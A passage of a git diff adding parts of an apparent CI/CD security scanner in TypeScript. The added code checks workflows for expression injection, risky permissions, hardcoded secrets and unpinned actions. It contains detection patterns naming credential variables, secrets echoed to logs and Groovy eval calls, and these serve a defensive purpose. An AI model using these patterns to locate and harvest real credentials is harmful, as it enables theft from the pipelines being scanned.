+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+
+        // Check for dangerous GitHub expressions
+        for (let i = 0; i < GITHUB_DANGEROUS_EXPRESSIONS.length; i++) {
+          const expr = GITHUB_DANGEROUS_EXPRESSIONS[i]
+          expr.lastIndex = 0
+
+          if (expr.test(step.command)) {
+            const context = CICDTypes.DANGEROUS_GITHUB_CONTEXTS[i]
+
+            findings.push({
+              id: generateFindingId(),
+              category: "injection",
+              severity: "high",
+              title: `Untrusted Input in Command: ${context}`,
+              description: `Step '${step.name}' uses potentially untrusted input from '${context}' in a shell command. This may be exploitable depending on how the value is used.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: step.command.slice(0, 200),
+              remediation: `Avoid using '${context}' directly in run commands. If needed, sanitize the input or use it via an environment variable with proper quoting.`,
+              references: [
+                "https://securitylab.github.com/research/github-actions-untrusted-input/",
+              ],
+              cwe: "CWE-78",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+
+        // Check for dangerous uses in step inputs
+        if (step.inputs) {
+          for (const [inputKey, inputValue] of Object.entries(step.inputs)) {
+            for (let i = 0; i < GITHUB_DANGEROUS_EXPRESSIONS.length; i++) {
+              const expr = GITHUB_DANGEROUS_EXPRESSIONS[i]
+              expr.lastIndex = 0
+
+              if (expr.test(String(inputValue))) {
+                const context = CICDTypes.DANGEROUS_GITHUB_CONTEXTS[i]
+
+                // Check if this is a script input (higher severity)
+                if (inputKey === "script" || inputKey === "run-script") {
+                  findings.push({
+                    id: generateFindingId(),
+                    category: "injection",
+                    severity: "critical",
+                    title: "Script Injection via Action Input",
+                    description: `Step '${step.name}' passes untrusted input from '${context}' to a script input of action '${step.action}'. This is likely exploitable for command injection.`,
+                    file: pipeline.path,
+                    line: step.line,
+                    pipeline: pipeline.name,
+                    job: job.id,
+                    step: step.id,
+                    evidence: `${inputKey}: ${String(inputValue).slice(0, 100)}`,
+                    remediation: "Do not pass untrusted input to script inputs. Sanitize the input or use an alternative approach.",
+                    references: [],
+                    cwe: "CWE-78",
+                    falsePositive: false,
+                    suppressed: false,
+                    foundAt: Date.now(),
+                  })
+                }
+              }
+            }
+          }
+        }
+      }
+
+      // Check environment variables set at job level
+      for (const [envKey, envValue] of Object.entries(job.env)) {
+        for (let i = 0; i < GITHUB_DANGEROUS_EXPRESSIONS.length; i++) {
+          const expr = GITHUB_DANGEROUS_EXPRESSIONS[i]
+          expr.lastIndex = 0
+
+          if (expr.test(envValue)) {
+            const context = CICDTypes.DANGEROUS_GITHUB_CONTEXTS[i]
+
+            // This is actually the recommended pattern, so it's lower severity
+            findings.push({
+              id: generateFindingId(),
+              category: "injection",
+              severity: "info",
+              title: "Untrusted Input Stored in Environment Variable",
+              description: `Job '${job.id}' stores untrusted input from '${context}' in environment variable '${envKey}'. Ensure the variable is properly quoted when used in shell commands.`,
+              file: pipeline.path,
+              line: job.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              evidence: `${envKey}: ${envValue}`,
+              remediation: "When using this environment variable in shell commands, always quote it: \"$" + envKey + "\"",
+              references: [],
+              cwe: "CWE-78",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Detect GitLab CI injection vulnerabilities
+   */
+  function detectGitLabInjection(
+    pipeline: CICDTypes.PipelineConfig,
+    content: string,
+    _options: InjectionDetectionOptions
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (!step.command) continue
+
+        for (const pattern of GITLAB_DANGEROUS_PATTERNS) {
+          if (pattern.pattern.test(step.command)) {
+            findings.push({
+              id: generateFindingId(),
+              category: "injection",
+              severity: pattern.severity,
+              title: `Potential Injection via ${pattern.context}`,
+              description: `Job '${job.id}' uses ${pattern.context} in a script. This variable may contain attacker-controlled content in merge request pipelines.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: step.command.slice(0, 200),
+              remediation: `Sanitize the ${pattern.context} before using it in shell commands, or avoid using it in executable contexts.`,
+              references: [
+                "https://docs.gitlab.com/ee/ci/variables/predefined_variables.html",
+              ],
+              cwe: "CWE-78",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Detect Jenkins pipeline injection vulnerabilities
+   */
+  function detectJenkinsInjection(
+    pipeline: CICDTypes.PipelineConfig,
+    content: string,
+    _options: InjectionDetectionOptions
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (!step.command) continue
+
+        for (const pattern of JENKINS_DANGEROUS_PATTERNS) {
+          if (pattern.pattern.test(step.command)) {
+            findings.push({
+              id: generateFindingId(),
+              category: "injection",
+              severity: pattern.severity,
+              title: `Potential Injection via ${pattern.context}`,
+              description: `Stage '${job.name}' uses a ${pattern.context} in a shell command. User-controlled parameters may allow command injection.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: step.command.slice(0, 200),
+              remediation: `Validate and sanitize ${pattern.context} values before using them in shell commands. Consider using the 'string' parameter type with validation.`,
+              references: [
+                "https://www.jenkins.io/doc/book/security/controller-isolation/",
+              ],
+              cwe: "CWE-78",
+              falsePositive: false,
+              suppressed: false,
+              foundAt: Date.now(),
+            })
+          }
+        }
+      }
+    }
+
+    // Check for Groovy script injection
+    const groovyEvalPatterns = [
+      /evaluate\s*$/,
+      /Eval\.me\s*\(/,
+      /GroovyShell\s*\($/,
+    ]
+
+    for (const pattern of groovyEvalPatterns) {
+      if (pattern.test(content)) {
+        findings.push({
+          id: generateFindingId(),
+          category: "injection",
+          severity: "high",
+          title: "Groovy Code Evaluation",
+          description: "Pipeline uses dynamic Groovy code evaluation. This can lead to code injection if user input reaches the evaluated code.",
+          file: pipeline.path,
+          pipeline: pipeline.name,
+          evidence: content.match(pattern)?.[0],
+          remediation: "Avoid using evaluate(), Eval.me(), or dynamic GroovyShell execution. Use parameterized approaches instead.",
+          references: [
+            "https://www.jenkins.io/doc/book/security/managing-security/",
+          ],
+          cwe: "CWE-94",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        })
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `if_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Check if a workflow trigger makes injection more likely
+   */
+  export function checkRiskyTriggers(
+    pipeline: CICDTypes.PipelineConfig
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    // pull_request_target is particularly risky
+    const hasPRTarget = pipeline.triggers.some((t) => {
+      const rawContent = pipeline.raw || ""
+      return rawContent.includes("pull_request_target")
+    })
+
+    if (hasPRTarget) {
+      findings.push({
+        id: generateFindingId(),
+        category: "injection",
+        severity: "high",
+        title: "Risky Trigger: pull_request_target",
+        description: "Workflow uses pull_request_target trigger which runs in the context of the base branch with access to secrets. Combined with untrusted input from the PR, this can lead to serious vulnerabilities.",
+        file: pipeline.path,
+        pipeline: pipeline.name,
+        remediation: "Avoid pull_request_target unless absolutely necessary. If needed, never check out PR code directly or use expressions from the PR context.",
+        references: [
+          "https://securitylab.github.com/research/github-actions-preventing-pwn-requests/",
+        ],
+        cwe: "CWE-284",
+        falsePositive: false,
+        suppressed: false,
+        foundAt: Date.now(),
+      })
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/checks/permissions.ts b/packages/opencode/src/pentest/cicd/checks/permissions.ts
new file mode 100644
index 00000000000..98e0c2612db
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/checks/permissions.ts
@@ -0,0 +1,361 @@
+/**
+ * @fileoverview CI/CD Permission Analysis
+ *
+ * Analyzes permissions in CI/CD configurations for overly permissive
+ * settings and principle of least privilege violations.
+ */
+
+import { CICDTypes } from "../types"
+
+/** Permission analysis options */
+export interface PermissionAnalysisOptions {
+  /** Consider write permissions as risky */
+  flagWritePermissions?: boolean
+  /** Consider admin permissions as critical */
+  flagAdminPermissions?: boolean
+  /** Custom risky permission definitions */
+  customRiskyPermissions?: Array<{
+    resource: string
+    scope: string
+    reason: string
+    severity: CICDTypes.Severity
+  }>
+}
+
+/** Permission analysis result */
+export interface PermissionAnalysisResult {
+  findings: CICDTypes.CICDFinding[]
+  permissionsAnalyzed: number
+  riskyPermissions: number
+  score: number
+}
+
+export namespace PermissionsCheck {
+  /** Permission severity mapping */
+  const PERMISSION_SEVERITY: Record<string, Record<string, CICDTypes.Severity>> = {
+    contents: { write: "high", admin: "critical" },
+    actions: { write: "high", admin: "critical" },
+    packages: { write: "medium", admin: "high" },
+    deployments: { write: "medium", admin: "high" },
+    "id-token": { write: "medium" },
+    "pull-requests": { write: "medium", admin: "high" },
+    "security-events": { write: "medium", admin: "high" },
+    issues: { write: "low", admin: "medium" },
+    pages: { write: "medium", admin: "high" },
+    statuses: { write: "low" },
+    checks: { write: "medium" },
+  }
+
+  /** Resources that are particularly sensitive */
+  const SENSITIVE_RESOURCES = ["contents", "actions", "packages", "deployments", "id-token"]
+
+  /**
+   * Analyze permissions in a pipeline configuration
+   */
+  export function analyze(
+    pipeline: CICDTypes.PipelineConfig,
+    options: PermissionAnalysisOptions = {}
+  ): PermissionAnalysisResult {
+    const findings: CICDTypes.CICDFinding[] = []
+    let riskyPermissions = 0
+
+    // Combine global and job-level permissions
+    const allPermissions: Array<{
+      permission: CICDTypes.Permission
+      job?: string
+    }> = []
+
+    // Add global permissions
+    for (const perm of pipeline.permissions) {
+      allPermissions.push({ permission: perm })
+    }
+
+    // Add job-level permissions
+    for (const job of pipeline.jobs) {
+      for (const perm of job.permissions) {
+        allPermissions.push({ permission: perm, job: job.id })
+      }
+    }
+
+    // Analyze each permission
+    for (const { permission, job } of allPermissions) {
+      const finding = analyzePermission(permission, pipeline, job, options)
+      if (finding) {
+        findings.push(finding)
+        riskyPermissions++
+      }
+    }
+
+    // Check for missing permission restrictions
+    if (pipeline.permissions.length === 0 && pipeline.provider === "github") {
+      findings.push({
+        id: generateFindingId(),
+        category: "permissions",
+        severity: "medium",
+        title: "No Explicit Permissions Defined",
+        description: "Workflow does not define explicit permissions. GitHub Actions workflows without explicit permissions inherit default permissions which may be overly permissive.",
+        file: pipeline.path,
+        pipeline: pipeline.name,
+        remediation: "Add explicit permissions block at workflow or job level to follow principle of least privilege.",
+        references: [
+          "https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token",
+        ],
+        cwe: "CWE-269",
+        falsePositive: false,
+        suppressed: false,
+        foundAt: Date.now(),
+      })
+    }
+
+    // Check for write-all or read-all
+    const hasWriteAll = allPermissions.some(
+      (p) => p.permission.scope === "write-all"
+    )
+    const hasReadAll = allPermissions.some(
+      (p) => p.permission.scope === "read-all" && p.permission.resource === "all"
+    )
+
+    if (hasWriteAll) {
+      findings.push({
+        id: generateFindingId(),
+        category: "permissions",
+        severity: "critical",
+        title: "Write-All Permissions Granted",
+        description: "Workflow grants write access to all resources. This violates the principle of least privilege and significantly increases attack surface.",
+        file: pipeline.path,
+        pipeline: pipeline.name,
+        remediation: "Replace 'permissions: write-all' with specific permissions for only the resources needed.",
+        references: [
+          "https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-the-github-token",
+        ],
+        cwe: "CWE-269",
+        falsePositive: false,
+        suppressed: false,
+        foundAt: Date.now(),
+      })
+      riskyPermissions++
+    }
+
+    // Check for self-hosted runners with elevated permissions
+    for (const job of pipeline.jobs) {
+      if (job.runsOn?.includes("self-hosted")) {
+        const jobPerms = allPermissions.filter((p) => p.job === job.id)
+        const hasElevatedPerms = jobPerms.some(
+          (p) =>
+            p.permission.scope === "write" ||
+            p.permission.scope === "admin" ||
+            p.permission.scope === "write-all"
+        )
+
+        if (hasElevatedPerms) {
+          findings.push({
+            id: generateFindingId(),
+            category: "runner",
+            severity: "high",
+            title: "Self-Hosted Runner with Elevated Permissions",
+            description: `Job '${job.id}' runs on a self-hosted runner with elevated permissions. Self-hosted runners have persistent access and elevated permissions increase the impact of a compromise.`,
+            file: pipeline.path,
+            line: job.line,
+            pipeline: pipeline.name,
+            job: job.id,
+            remediation: "Use GitHub-hosted runners for jobs requiring elevated permissions, or minimize permissions for self-hosted runner jobs.",
+            references: [
+              "https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners#self-hosted-runner-security",
+            ],
+            cwe: "CWE-269",
+            falsePositive: false,
+            suppressed: false,
+            foundAt: Date.now(),
+          })
+          riskyPermissions++
+        }
+      }
+    }
+
+    // Calculate security score (0-100)
+    const score = calculateScore(allPermissions.length, riskyPermissions, hasWriteAll)
+
+    return {
+      findings,
+      permissionsAnalyzed: allPermissions.length,
+      riskyPermissions,
+      score,
+    }
+  }
+
+  /**
+   * Analyze a single permission
+   */
+  function analyzePermission(
+    permission: CICDTypes.Permission,
+    pipeline: CICDTypes.PipelineConfig,
+    job: string | undefined,
+    options: PermissionAnalysisOptions
+  ): CICDTypes.CICDFinding | null {
+    const { resource, scope } = permission
+
+    // Check if this is a risky permission
+    const severityMap = PERMISSION_SEVERITY[resource]
+    const severity = severityMap?.[scope]
+
+    if (!severity) {
+      // Check custom risky permissions
+      const customRisk = options.customRiskyPermissions?.find(
+        (r) => r.resource === resource && r.scope === scope
+      )
+      if (customRisk) {
+        return {
+          id: generateFindingId(),
+          category: "permissions",
+          severity: customRisk.severity,
+          title: `${customRisk.reason}`,
+          description: `Permission '${resource}: ${scope}' is flagged as risky: ${customRisk.reason}`,
+          file: pipeline.path,
+          line: permission.line,
+          pipeline: pipeline.name,
+          job,
+          remediation: `Review if '${resource}: ${scope}' permission is necessary. If not, remove or reduce the scope.`,
+          references: [],
+          cwe: "CWE-269",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        }
+      }
+
+      // Default checks
+      if (options.flagWritePermissions && scope === "write") {
+        return {
+          id: generateFindingId(),
+          category: "permissions",
+          severity: "low",
+          title: `Write Permission: ${resource}`,
+          description: `Job has write permission for '${resource}'. Verify this is necessary.`,
+          file: pipeline.path,
+          line: permission.line,
+          pipeline: pipeline.name,
+          job,
+          remediation: `Consider if '${resource}: read' would be sufficient.`,
+          references: [],
+          cwe: "CWE-269",
+          falsePositive: false,
+          suppressed: false,
+          foundAt: Date.now(),
+        }
+      }
+
+      return null
+    }
+
+    // Risky permission detected
+    const reason = permission.reason || CICDTypes.RISKY_PERMISSIONS.find(
+      (r) => r.resource === resource
+    )?.reason
+
+    return {
+      id: generateFindingId(),
+      category: "permissions",
+      severity,
+      title: `Elevated Permission: ${resource}: ${scope}`,
+      description: `${reason || `Permission '${resource}: ${scope}' grants elevated access.`}`,
+      file: pipeline.path,
+      line: permission.line,
+      pipeline: pipeline.name,
+      job,
+      evidence: `permissions:\n  ${resource}: ${scope}`,
+      remediation: getRemediation(resource, scope),
+      references: getReferences(resource),
+      cwe: "CWE-269",
+      falsePositive: false,
+      suppressed: false,
+      foundAt: Date.now(),
+    }
+  }
+
+  /**
+   * Get remediation for a permission
+   */
+  function getRemediation(resource: string, scope: string): string {
+    const remediations: Record<string, string> = {
+      contents: "contents: write allows modifying repository files. Use contents: read unless you need to commit changes.",
+      actions: "actions: write allows modifying workflow files. This is rarely needed and should be avoided.",
+      packages: "packages: write allows publishing packages. Ensure this is only granted to release workflows.",
+      deployments: "deployments: write allows creating deployments. Restrict to deployment workflows only.",
+      "id-token": "id-token: write allows requesting OIDC tokens. Only grant to workflows that need cloud authentication.",
+    }
+    return remediations[resource] || `Review if '${resource}: ${scope}' is necessary for this workflow.`
+  }
+
+  /**
+   * Get reference URLs for a permission
+   */
+  function getReferences(resource: string): string[] {
+    return [
+      "https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token",
+      "https://docs.github.com/en/actions/using-jobs/assigning-permissions-to-jobs",
+    ]
+  }
+
+  /**
+   * Calculate permission security score
+   */
+  function calculateScore(
+    total: number,
+    risky: number,
+    hasWriteAll: boolean
+  ): number {
+    if (hasWriteAll) return 0
+    if (total === 0) return 50 // No explicit permissions is medium risk
+
+    const riskyRatio = risky / total
+    const score = Math.round((1 - riskyRatio) * 100)
+
+    return Math.max(0, Math.min(100, score))
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `pf_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Check if a workflow trigger is risky for certain permissions
+   */
+  export function checkTriggerPermissionRisk(
+    pipeline: CICDTypes.PipelineConfig
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+
+    // Check for pull_request_target with write permissions
+    const hasPRTarget = pipeline.triggers.some(
+      (t) => t.type === "pull_request"
+    )
+    const hasWriteContents = pipeline.permissions.some(
+      (p) => p.resource === "contents" && (p.scope === "write" || p.scope === "write-all")
+    )
+
+    if (hasPRTarget && hasWriteContents) {
+      findings.push({
+        id: generateFindingId(),
+        category: "permissions",
+        severity: "critical",
+        title: "Pull Request Trigger with Write Permissions",
+        description: "Workflow triggered by pull_request (or pull_request_target) has write permissions to contents. This can be exploited by malicious PRs to modify the repository.",
+        file: pipeline.path,
+        pipeline: pipeline.name,
+        remediation: "Use pull_request trigger (which runs in PR context) instead of pull_request_target, or remove write permissions. If you need both, split into separate workflows.",
+        references: [
+          "https://securitylab.github.com/research/github-actions-preventing-pwn-requests/",
+        ],
+        cwe: "CWE-284",
+        falsePositive: false,
+        suppressed: false,
+        foundAt: Date.now(),
+      })
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/checks/secrets.ts b/packages/opencode/src/pentest/cicd/checks/secrets.ts
new file mode 100644
index 00000000000..34f64e4053b
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/checks/secrets.ts
@@ -0,0 +1,364 @@
+/**
+ * @fileoverview CI/CD Secret Detection
+ *
+ * Detects hardcoded secrets and exposed credentials in CI/CD configurations
+ * using pattern matching and entropy analysis.
+ */
+
+import { CICDTypes } from "../types"
+import { ProviderUtils } from "../providers/base"
+
+/** Secret detection options */
+export interface SecretDetectionOptions {
+  /** Custom patterns to include */
+  customPatterns?: CICDTypes.SecretPattern[]
+  /** Minimum entropy threshold for generic secret detection */
+  entropyThreshold?: number
+  /** Patterns to exclude (by ID) */
+  excludePatterns?: string[]
+  /** Check for secrets in logs/echo statements */
+  checkLogExposure?: boolean
+}
+
+/** Secret detection result */
+export interface SecretDetectionResult {
+  findings: CICDTypes.SecretFinding[]
+  secretsFound: number
+  patternsMatched: string[]
+  highEntropyStrings: number
+}
+
+export namespace SecretsCheck {
+  /** Default entropy threshold */
+  const DEFAULT_ENTROPY_THRESHOLD = 4.5
+
+  /** Patterns for detecting secret exposure in logs */
+  const LOG_EXPOSURE_PATTERNS = [
+    /echo\s+.*\$\{\{?\s*secrets\./gi,
+    /echo\s+.*\$[A-Z_]+/gi,
+    /print(?:ln)?\s*\(.*\$\{\{?\s*secrets\./gi,
+    /console\.log\s*\(.*\$\{\{?\s*secrets\./gi,
+    /Write-(?:Host|Output)\s+.*\$env:/gi,
+  ]
+
+  /** High entropy indicators for variable names */
+  const SECRET_VARIABLE_NAMES = [
+    /(?:api[_-]?key|apikey)/i,
+    /(?:secret[_-]?key|secretkey)/i,
+    /(?:access[_-]?token|accesstoken)/i,
+    /(?:auth[_-]?token|authtoken)/i,
+    /(?:private[_-]?key|privatekey)/i,
+    /(?:password|passwd|pwd)/i,
+    /(?:credential|cred)/i,
+    /(?:bearer)/i,
+  ]
+
+  /**
+   * Detect secrets in CI/CD configuration content
+   */
+  export function detect(
+    content: string,
+    filePath: string,
+    options: SecretDetectionOptions = {}
+  ): SecretDetectionResult {
+    const findings: CICDTypes.SecretFinding[] = []
+    const patternsMatched = new Set<string>()
+    let highEntropyStrings = 0
+
+    const entropyThreshold = options.entropyThreshold ?? DEFAULT_ENTROPY_THRESHOLD
+    const patterns = [
+      ...CICDTypes.SECRET_PATTERNS.filter(
+        (p) => !options.excludePatterns?.includes(p.id)
+      ),
+      ...(options.customPatterns || []),
+    ]
+
+    const lines = content.split("\n")
+
+    // Pattern-based detection
+    for (const pattern of patterns) {
+      try {
+        const regex = new RegExp(pattern.pattern, "g")
+        let match
+
+        while ((match = regex.exec(content)) !== null) {
+          const line = getLineNumber(content, match.index)
+          const column = getColumnNumber(content, match.index)
+          const matchText = match[0]
+
+          // Skip if it looks like a reference rather than a value
+          if (isReference(matchText)) continue
+
+          // Calculate entropy for additional confidence
+          const entropy = ProviderUtils.calculateEntropy(matchText)
+
+          const finding: CICDTypes.SecretFinding = {
+            id: generateFindingId(),
+            patternId: pattern.id,
+            patternName: pattern.name,
+            file: filePath,
+            line,
+            column,
+            match: matchText,
+            redacted: redactSecret(matchText),
+            entropy,
+            severity: pattern.severity,
+            context: getContext(lines, line - 1),
+          }
+
+          findings.push(finding)
+          patternsMatched.add(pattern.id)
+        }
+      } catch {
+        // Invalid regex pattern, skip
+      }
+    }
+
+    // Entropy-based detection for suspicious strings
+    const highEntropyMatches = detectHighEntropyStrings(content, entropyThreshold)
+    for (const match of highEntropyMatches) {
+      // Skip if already detected by pattern
+      if (findings.some((f) => f.match === match.value)) continue
+
+      const line = getLineNumber(content, content.indexOf(match.value))
+      highEntropyStrings++
+
+      // Check if it's in a secret-like variable assignment
+      const contextLine = lines[line - 1] || ""
+      const isSecretVariable = SECRET_VARIABLE_NAMES.some((p) => p.test(contextLine))
+
+      if (isSecretVariable) {
+        findings.push({
+          id: generateFindingId(),
+          patternId: "high-entropy",
+          patternName: "High Entropy String",
+          file: filePath,
+          line,
+          match: match.value,
+          redacted: redactSecret(match.value),
+          entropy: match.entropy,
+          severity: "medium",
+          context: getContext(lines, line - 1),
+        })
+        patternsMatched.add("high-entropy")
+      }
+    }
+
+    // Check for log exposure
+    if (options.checkLogExposure !== false) {
+      const exposures = detectLogExposure(content, filePath)
+      for (const exposure of exposures) {
+        findings.push(exposure)
+        patternsMatched.add("log-exposure")
+      }
+    }
+
+    return {
+      findings,
+      secretsFound: findings.length,
+      patternsMatched: Array.from(patternsMatched),
+      highEntropyStrings,
+    }
+  }
+
+  /**
+   * Detect secrets exposed in log/echo statements
+   */
+  function detectLogExposure(
+    content: string,
+    filePath: string
+  ): CICDTypes.SecretFinding[] {
+    const findings: CICDTypes.SecretFinding[] = []
+    const lines = content.split("\n")
+
+    for (let i = 0; i < lines.length; i++) {
+      const line = lines[i]
+
+      for (const pattern of LOG_EXPOSURE_PATTERNS) {
+        if (pattern.test(line)) {
+          // Reset lastIndex since we're reusing regex
+          pattern.lastIndex = 0
+
+          findings.push({
+            id: generateFindingId(),
+            patternId: "log-exposure",
+            patternName: "Secret Exposed in Logs",
+            file: filePath,
+            line: i + 1,
+            match: line.trim(),
+            redacted: line.trim().slice(0, 50) + "...",
+            severity: "high",
+            context: getContext(lines, i),
+          })
+          break // Only one finding per line
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Detect high entropy strings that might be secrets
+   */
+  function detectHighEntropyStrings(
+    content: string,
+    threshold: number
+  ): { value: string; entropy: number }[] {
+    const results: { value: string; entropy: number }[] = []
+
+    // Match quoted strings and unquoted values in assignments
+    const stringPattern = /['"]([A-Za-z0-9+/=_-]{20,})['"]|[:=]\s*([A-Za-z0-9+/=_-]{20,})(?:\s|$)/g
+    let match
+
+    while ((match = stringPattern.exec(content)) !== null) {
+      const value = match[1] || match[2]
+      if (!value) continue
+
+      // Skip common non-secret patterns
+      if (isCommonNonSecret(value)) continue
+
+      const entropy = ProviderUtils.calculateEntropy(value)
+      if (entropy >= threshold) {
+        results.push({ value, entropy })
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Check if a string is a reference rather than an actual value
+   */
+  function isReference(value: string): boolean {
+    // GitHub-style secret reference
+    if (/\$\{\{\s*secrets\./.test(value)) return true
+    // Variable reference
+    if (/^\$\{?[A-Z_][A-Z0-9_]*\}?$/.test(value)) return true
+    // Environment variable expansion
+    if (/^\$env:/.test(value)) return true
+    return false
+  }
+
+  /**
+   * Check if a string is a common non-secret value
+   */
+  function isCommonNonSecret(value: string): boolean {
+    // All same character
+    if (new Set(value).size <= 2) return true
+    // Common placeholder patterns
+    if (/^x+$/i.test(value) || /^0+$/.test(value)) return true
+    // Base64-encoded common strings
+    if (value === "dGVzdA==" || value === "YWRtaW4=") return true
+    // File paths
+    if (value.includes("/") || value.includes("\\")) return true
+    // URLs
+    if (/^https?:\/\//.test(value)) return true
+    // Version strings
+    if (/^v?\d+\.\d+/.test(value)) return true
+    return false
+  }
+
+  /**
+   * Redact a secret value for safe display
+   */
+  function redactSecret(value: string): string {
+    if (value.length <= 8) {
+      return "*".repeat(value.length)
+    }
+    const visible = Math.min(4, Math.floor(value.length / 4))
+    return value.slice(0, visible) + "*".repeat(value.length - visible * 2) + value.slice(-visible)
+  }
+
+  /**
+   * Get context lines around a match
+   */
+  function getContext(lines: string[], lineIndex: number): string {
+    const start = Math.max(0, lineIndex - 1)
+    const end = Math.min(lines.length, lineIndex + 2)
+    return lines.slice(start, end).join("\n")
+  }
+
+  /**
+   * Get line number from character offset
+   */
+  function getLineNumber(content: string, offset: number): number {
+    return content.slice(0, offset).split("\n").length
+  }
+
+  /**
+   * Get column number from character offset
+   */
+  function getColumnNumber(content: string, offset: number): number {
+    const lastNewline = content.lastIndexOf("\n", offset)
+    return offset - lastNewline
+  }
+
+  /**
+   * Generate unique finding ID
+   */
+  function generateFindingId(): string {
+    return `sf_${Date.now().toString(36)}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  /**
+   * Convert secret findings to CI/CD findings
+   */
+  export function toFindings(
+    secretFindings: CICDTypes.SecretFinding[],
+    pipeline?: string
+  ): CICDTypes.CICDFinding[] {
+    return secretFindings.map((sf) => ({
+      id: sf.id,
+      category: "secrets" as const,
+      severity: sf.severity,
+      title: `Hardcoded ${sf.patternName}`,
+      description: `Detected ${sf.patternName} in CI/CD configuration. Value: ${sf.redacted}`,
+      file: sf.file,
+      line: sf.line,
+      column: sf.column,
+      pipeline,
+      evidence: sf.context,
+      remediation: getRemediation(sf.patternId),
+      references: getReferences(sf.patternId),
+      cwe: "CWE-798",
+      falsePositive: false,
+      suppressed: false,
+      foundAt: Date.now(),
+    }))
+  }
+
+  /**
+   * Get remediation advice for a pattern
+   */
+  function getRemediation(patternId: string): string {
+    const remediations: Record<string, string> = {
+      "github-token": "Use ${{ secrets.GITHUB_TOKEN }} or encrypted secrets instead of hardcoded tokens.",
+      "aws-access-key": "Use AWS OIDC authentication or store credentials in GitHub Secrets/environment secrets.",
+      "aws-secret-key": "Never hardcode AWS secret keys. Use IAM roles, OIDC, or encrypted secrets.",
+      "private-key": "Store private keys in encrypted secrets or use a secrets manager like HashiCorp Vault.",
+      "generic-api-key": "Move API keys to encrypted environment secrets and reference them via ${{ secrets.NAME }}.",
+      "generic-secret": "Store sensitive values in encrypted secrets, not in pipeline configuration files.",
+      "log-exposure": "Remove secret values from log/echo statements. Use masked variables instead.",
+      "high-entropy": "Review this value to determine if it's sensitive. If so, move it to encrypted secrets.",
+    }
+    return remediations[patternId] || "Store sensitive values in encrypted secrets instead of hardcoding them."
+  }
+
+  /**
+   * Get reference URLs for a pattern
+   */
+  function getReferences(patternId: string): string[] {
+    const refs: Record<string, string[]> = {
+      "github-token": [
+        "https://docs.github.com/en/actions/security-guides/encrypted-secrets",
+        "https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions",
+      ],
+      "aws-access-key": [
+        "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html",
+        "https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services",
+      ],
+    }
+    return refs[patternId] || []
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/checks/supply-chain.ts b/packages/opencode/src/pentest/cicd/checks/supply-chain.ts
new file mode 100644
index 00000000000..0d438d019a1
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/checks/supply-chain.ts
@@ -0,0 +1,381 @@
+/**
+ * @fileoverview CI/CD Supply Chain Security Checks
+ *
+ * Detects supply chain security issues including unpinned actions,
+ * untrusted dependencies, and vulnerable third-party integrations.
+ */
+
+import { CICDTypes } from "../types"
+
+/** Supply chain check options */
+export interface SupplyChainCheckOptions {
+  /** Require SHA pinning for all actions */
+  requirePinning?: boolean
+  /** Allow only trusted action prefixes */
+  trustedPrefixes?: string[]
+  /** Custom blocklist of actions */
+  blocklist?: string[]
+}
+
+/** Supply chain check result */
+export interface SupplyChainCheckResult {
+  findings: CICDTypes.CICDFinding[]
+  actionsAnalyzed: number
+  unpinnedActions: number
+  untrustedActions: number
+}
+
+export namespace SupplyChainCheck {
+  /** Known vulnerable or risky actions */
+  const RISKY_ACTIONS = [
+    { name: "actions/stale", reason: "Can close issues/PRs, verify bot usage" },
+  ]
+
+  /** Actions that should always be pinned */
+  const CRITICAL_ACTIONS = [
+    "actions/checkout",
+    "actions/setup-node",
+    "actions/setup-python",
+    "actions/cache",
+    "docker/build-push-action",
+    "docker/login-action",
+    "aws-actions/configure-aws-credentials",
+    "azure/login",
+    "google-github-actions/auth",
